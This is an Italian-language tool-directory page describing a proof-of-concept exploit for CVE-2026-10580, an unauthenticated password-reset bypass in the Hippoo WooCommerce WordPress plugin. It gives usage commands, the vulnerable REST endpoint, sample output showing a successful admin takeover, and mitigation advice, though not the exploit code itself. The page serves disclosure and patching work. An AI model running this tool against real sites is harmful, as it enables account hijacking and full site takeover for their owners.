Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-10580 — Exploit PoC per CVE-2026-10580 - Bypass dell'autenticazione nell'app mobile Hippoo per WooCommerce <= 1.9.4 che porta alla presa di controllo dell'account amministratore | Kitploit
Strumenti/GitHubGitHub/0xgh057r3c0n/cve-2026-10580
Autenticazione e AutorizzazioneAttacchi alle PasswordAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHub0xgh057r3c0n/cve-2026-10580

CVE-2026-10580

Exploit PoC per CVE-2026-10580 - Bypass dell'autenticazione nell'app mobile Hippoo per WooCommerce <= 1.9.4 che porta alla presa di controllo dell'account amministratore

Vedi Repository
1 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

WordPress

WordPress - Hippoo Mobile App for WooCommerce <= 1.9.4 - Bypass di autenticazione per il takeover dell'account amministratore

License: MIT

Panoramica

Questo strumento è un exploit proof-of-concept per CVE-2026-10580, una vulnerabilità di bypass dell'autenticazione che interessa il plugin WordPress Hippoo Mobile App for WooCommerce (versioni <= 1.9.4). La vulnerabilità consente ad attaccanti non autenticati di reimpostare la password di qualsiasi utente, inclusi gli amministratori, portando al completo takeover del sito.

⚠️ Importante: Questo strumento è solo per test di sicurezza autorizzati e scopi educativi. L'uso non autorizzato contro sistemi di cui non si è proprietari o per cui non si ha esplicito permesso di test è illegale.

Caratteristiche

  • Enumera tutti gli utenti WordPress tramite l'endpoint API REST vulnerabile
  • Reimposta la password per un ID utente specificato (predefinito: ID amministratore 1)
  • Interfaccia a riga di comando semplice con output colorato
  • Opzione per disabilitare la verifica SSL per ambienti di test

Utilizzo

Prerequisiti

  • Python 3.6+
  • Libreria requests

Installa le dipendenze:

root@kitploit:~
pip install requests

Comando base

root@kitploit:~
python3 exploit.py -t https://target-site.com -p NewPassword123!

Opzioni

Esempi

Exploit con ID amministratore predefinito (1) e verifica SSL:

root@kitploit:~
python3 exploit.py -t https://example.com -p PwnedCVE2026!!

Destinazione di un ID utente specifico e disabilitazione della verifica SSL:

root@kitploit:~
python3 exploit.py -t https://example.com -p NewPass123 -i 2 -k

Esecuzione senza banner:

root@kitploit:~
python3 exploit.py -t https://example.com -p NewPass123 --no-banner

Esempio di output

root@kitploit:~
[+] Trovati 3 utenti
    - ID utente: 1 | Nome utente: admin | Ruolo: amministratore
    - ID utente: 2 | Nome utente: editor_user | Ruolo: editor
    - ID utente: 3 | Nome utente: subscriber1 | Ruolo: subscriber

╔══════════════════════════════════════════════════════════════╗
║             TAKEOVER ADMIN RIUSCITO                          ║
╚══════════════════════════════════════════════════════════════╝
    Destinazione: https://example.com
    Login: https://example.com/wp-admin
    Nome utente: admin
    Password: PwnedCVE2026!!

Mitigazione

Se stai utilizzando il plugin Hippoo, aggiornalo immediatamente a una versione corretta (>1.9.4). Inoltre:

  • Controlla regolarmente gli account utente per modifiche non autorizzate
  • Monitora i log per richieste API inaspettate verso /wp-json/wc-hippoo/v1/ext/wp/v2/users
  • Considera di limitare l'accesso all'API REST di WordPress se non necessario

Licenza

Questo progetto è distribuito sotto la Licenza MIT. Vedi il file LICENSE per i dettagli.

Autore

0xgh057r3c0n

Dichiarazione di non responsabilità

L'autore non è responsabile per qualsiasi uso improprio di questo strumento. Usalo in modo responsabile e solo su sistemi di cui sei proprietario o per cui hai esplicito permesso di test.

Scarica lo strumento
ArgomentoDescrizione
-t, --targetURL del sito WordPress di destinazione (es., https://example.com)
-p, --passwordNuova password da impostare per l'account amministratore
-i, --idID utente di cui effettuare il takeover (predefinito: 1)
-k, --insecureSalta la verifica del certificato SSL
--no-bannerSopprimi il banner ASCII